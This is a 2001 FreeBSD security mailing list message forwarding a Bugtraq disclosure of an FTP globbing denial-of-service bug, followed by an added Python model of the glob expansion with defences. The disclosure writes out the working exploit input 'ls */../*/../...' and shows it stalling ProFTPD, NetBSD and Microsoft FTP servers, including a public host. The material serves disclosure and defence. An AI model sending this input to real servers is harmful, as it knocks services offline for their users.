From owner-freebsd-security Thu Mar 15 12:21:23 2001
Delivered-To: freebsd-security@freebsd.org
Received: from k2.jozsef.kando.hu (k2.jozsef.kando.hu [193.224.40.3]) by hub.freebsd.org (Postfix) with SMTP id A5C5637B719 for ; Thu, 15 Mar 2001 12:21:18 -0800 (PST) (envelope-from bra@fsn.hu)
Received: (qmail 10725 invoked by uid 1000); 15 Mar 2001 20:21:16 -0000
Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 15 Mar 2001 20:21:16 -0000
Date: Thu, 15 Mar 2001 21:21:16 +0100 (CET)
From: Attila Nagy
X-X-Sender:
To:
Subject: Multiple vendors FTP denial of service (fwd)
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

FreeBSD isn't listed, but also vulnerable, at least with the FTPd in -STABLE.

---------- Forwarded message ----------
Date: Thu, 15 Mar 2001 09:34:09 +0100
From: "Frank DENIS (Jedi/Sector One)"
To: BUGTRAQ@SECURITYFOCUS.COM
Subject: Multiple vendors FTP denial of service

- Proftpd built-in 'ls' command has a globbing bug that allows remote denial-of-service.

Here's a simple exploit, tested on the Proftpd site :

$ ftp ftp.proftpd.org
...
Name (ftp.proftpd.org:j): ftp
...
230 Anonymous access granted, restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
227 Entering Passive Mode (216,10,40,219,4,111).
421 Service not available, remote server timed out.
Connection closed

That command takes 100% CPU time on the server. It can lead to an easy DOS even if few remote simultaneous connections are allowed.

Other FTP servers may be concerned as well. Here are various tries :

- NetBSD FTP showed the same behavior as Proftpd :

ftp> ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
200 EPRT command successful.
(long delay)
421 Service not available, remote server timed out.
Connection closed

So NetBSD-ftpd 20000723a may also consume 100% cpu time, resulting in a possible DOS. Other BSD FTP may be affected as well.

- Microsoft FTP Service (Version 5.0) seems also confused by the command :

ftp> ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
500 'EPSV': command not understood
227 Entering Passive Mode (207,46,133,140,4,223).
200 PORT command successful.
150 Opening ASCII mode data connection for file list.
(very long delay... nothing happens...)

- Publicfile refuses the command :

ftp> ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
227 =131,193,178,181,97,222
550 Sorry, I can't open that file: file does not exist.

- Wu-FTPd 2.6.1 is not vulnerable. Only the result of 'ls *' is computed and displayed.

- PureFTPd (any version) is not vulnerable. Result is "Simplified wildcard expression to *" and the 'ls *' output.

Maintainers of vulnerable servers have been warned of this bug.

--
-=- Frank DENIS aka Jedi/Sector One < spam@jedi.claranet.fr > -=-
LINAGORA SA (Paris, France) : http://www.linagora.com
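Why the `*/../*/../...` argument burns CPU, and the two defences the post credits the non-vulnerable servers with (PureFTPd's simplification of the wildcard expression, and computing only a bounded 'ls *'), as an added example that is not code from any of the servers named above. The in-memory directory tree, the visit budget and the function names are this example's own assumptions.

```python
# Added example, not code from any server in the post: an in-memory model of
# LIST glob expansion with the two defences the post points at. Tree layout,
# limits and names are this example's own assumptions.
import fnmatch
import re
WILDCARD = re.compile(r"[*?\[]")

def simplify_glob(pattern):
    """Drop every '<wildcard>/..' pair: it descends into every directory and
    climbs straight back out, multiplying the work without adding matches
    (compare PureFTPd's 'Simplified wildcard expression to *')."""
    out = []
    for part in pattern.split("/"):
        if part == ".." and out and WILDCARD.search(out[-1]):
            out.pop()
            continue
        out.append(part)
    return "/".join(out) or "."

class GlobBudgetExceeded(RuntimeError):
    """Expansion needed more directory visits than the budget allows."""

def bounded_glob(tree, pattern, budget=1000):
    """Expand `pattern` against `tree` (nested dicts = directories, other values
    = files); abort after `budget` visits.  Returns (sorted matches, visits)."""
    parts = [p for p in pattern.split("/") if p not in ("", ".")]
    found, visits = set(), [0]

    def walk(stack, path, i):
        visits[0] += 1
        if visits[0] > budget:
            raise GlobBudgetExceeded(f"{visits[0]} directory visits")
        if i == len(parts):
            found.add("/".join(path) or ".")
            return
        part = parts[i]
        if part == "..":                          # climb, never above root
            if len(stack) > 1:
                walk(stack[:-1], path[:-1], i + 1)
            return
        for name, child in stack[-1].items():
            if not fnmatch.fnmatchcase(name, part):
                continue
            if isinstance(child, dict):
                walk(stack + [child], path + [name], i + 1)
            elif i + 1 == len(parts):             # a file only ends a pattern
                found.add("/".join(path + [name]))

    walk([tree], [], 0)
    return sorted(found), visits[0]
```

With only three top-level directories, each extra `*/..` hop multiplies the directory visits by three while the match set stays that of a plain `ls *`; the budget turns the runaway into a refused command, and the simplification removes the cost altogether.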